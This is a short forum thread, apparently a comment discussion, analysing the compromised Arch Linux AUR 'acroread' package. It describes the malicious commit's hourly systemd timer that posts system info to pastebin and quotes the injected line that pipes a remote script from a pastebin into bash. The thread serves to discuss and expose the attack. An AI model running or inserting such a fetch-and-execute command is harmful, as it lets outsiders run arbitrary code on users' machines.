Comment by Tharre
8 years ago
For the people interested, here's the actual commit from the acroread package:
https://aur.archlinux.org/cgit/aur.git/commit/?h=acroread&id...
8 years ago
For the people interested, here's the actual commit from the acroread package:
https://aur.archlinux.org/cgit/aur.git/commit/?h=acroread&id...
Following the URLs it appears that it sets up a systemd timer to post some system info to pastebin every hour. However the script also appears to have a mistake which I think would cause it to only log to /root/home/*/compromised.txt.
$uploader "$FULL_LOG"
should be
upload "$FULL_LOG"
> + curl -s https://ptpb.pw/~x|bash -&
So much for being sneaky malware, he wasn't even trying to hide it... Any insertion of a `curl` command to some shady looking TLD piping to bash is going to be a massive red flag to even unsophisticated linux users.
Not much to see here, fortunately.
that "shady" domain is the official pastebin for freenode's Arch Linux IRC channel
Even moreso: the fact that it's well-known as a pastebin means that it should be obvious data coming from it are user-generated and could come from anyone.